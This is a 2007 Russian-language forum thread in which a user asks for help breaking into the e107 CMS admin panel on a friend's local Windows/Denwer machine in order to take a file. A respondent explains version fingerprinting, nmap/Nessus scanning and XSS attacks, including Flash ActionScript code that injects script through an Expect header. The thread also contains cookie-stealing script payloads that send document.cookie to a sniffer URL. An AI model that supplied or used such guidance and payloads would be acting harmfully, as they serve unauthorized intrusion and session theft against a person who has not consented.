Народ есть чувак в локальной сети у него стоит денвер и движок е107. Всё это на виндовс. Помогите получить доступ к админке!!!
Токо не посылайте в гугл.
Токо не посылайте в гугл.
21.06.2007 16:45:26
Народ есть чувак в локальной сети у него стоит денвер и движок е107. Всё это на виндовс. Помогите получить доступ к админке!!!
Токо не посылайте в гугл. |
|
|
|
21.06.2007 17:58:46
1)
определись с версией e107, если она скрыта, получить информацию о ней можно из шаблонов скинов. затем в путь сюда 2) анализировать машину на предмет уязвимостей в ОС и установленных сервисах, тот же Денвер при неграмотной настройке покорен быстрому взлому, не говоря уже о том, что у твоего кента могу быть доступны расшаренные ресурсы, иметься уже годами неудалённые бекдоры и так далее. Я не привык использовать коммерч. сканнеры уязвимостей, поэтому удалённый анализ сетевой активности можно сделать связкой nmap plus nessus. 3) зачем тебе это ?) |
|
|
|
21.06.2007 20:29:08
1)да скрыт а как узнать с помощью шаблонов?
2) скоро дам результаты теста Xspidera 3)с пользой для себя ))) взять важный файл |
|
|
|
21.06.2007 21:37:02
1)
По .css стилям (каскадные таблицы стилей), очень часто в них закоментирована версия самой CMS. Плюс анализировать папки, в которых хранятся .js примочки, они содержат аналогичные вещи, так или иначе намекающие на версию.
Если не судьба, то можно воспользоваться следующим. Понять, выполняются ли уязвимости до какой-либо версии, если нет - следовательно версия старше. На примере: Так или иначе можно понять с какой версии вести отсчёт. Заметь, что если владеешь XSS, можно решить вопрос "впарив" линк с ним твоему товарищу, ибо некоторые версии e107 имеет кроме вышеописанной уязвимости ещё нефильтрующуюся область в теге [color] .
У вас каникулы начались ?) |
|||||
|
|
22.06.2007 00:20:13
Уникально.
|
|
|
|
22.06.2007 08:40:24
Ну что и как это поможет получить доступ??? Токо пишется по точнее я плохо разбираюсь )
skvoznoy по делу чёнит напиши ) |
|
|
|
22.06.2007 19:34:29
А как её реализовать научи )
|
|
|
|
24.06.2007 10:52:57
НУ ТЫ КУДА ДЕЛСЯ КАК РЕАЛИЗОВАТЬ НАЧИТЕ НАРОД ПЛИЗ!!!
|
|
|
|
24.06.2007 15:55:03
Лол, уже давно бы сам разобрался.
Проверь Простейший пример - с помощью Action Script будем передавать специальные параметры, : Специально для тебя переписал первый POC на эту тему от SecuriTeam, афишированный Amit Klein до 3 строк:
Осталось сделать из этого нормальный .sfw документ, у меня лично Flash CS3 - я просто делаю экспорт в .swf и выгружаю на хост. К слову, если ты его не юзаешь, можешь воспользоваться MTASC. Впариваем, естественно вид XSS другой - привычный с адрессацией на сниффер. Ясное дело, что модифицируешь XSS ты сам, так как научился пользоваться Xspider и явно поймёшь, тем более принцип я указал ) Самые простые конструкции XSS:
По поводу Sniffer - php sniffer'ов в сети уйма, найди статью "Немного об XSS" - там приведены примеры. |
|||||
|
|
24.06.2007 16:42:51
Про первый ваще не фига не понил. Куда что когда куда это всё писать что с этим делать )
Про 2 ясней <script>document.location="SNIFFER"+document.cookie</script> <script>img=new Image();img.src="SNIFFER"+document.cookie</script> Куда это пихать? ) А SNIFFER путь к сниферу? |
|
|
|
24.06.2007 19:05:48
Я тебе по русски написал -готовится отдельно Action Script код, с помощью MTASC компилится .swf документ, который может быть загружен на любой хост как вредоносный (содержащий XSS, ворующий куки на сниффер).
Ясней? ) Для начала бы хорошо прояснить собственные знания на тему общего кросс-сайтового скриптинга, вариации которого подставляются сюда:
Да. |
|||||||||
|
|
25.06.2007 22:48:06
Про первый: и чё вставлять в http://ресурс/ путь к сниферу?
var Get:LoadVars = new LoadVars(); Get.addRequestHeader("Expect","<script>alert(document.cookie)</script>"); Get.send("http://ресурс/","_self","POST"); И как мне потом эти куки расшифровать ? или как? Ещё вопрос если админ зайдёт на эту страницу куки своруется или токо когда он нажмёт на этот файл? Про 2 можно забыть ) |
||||
|
|
|||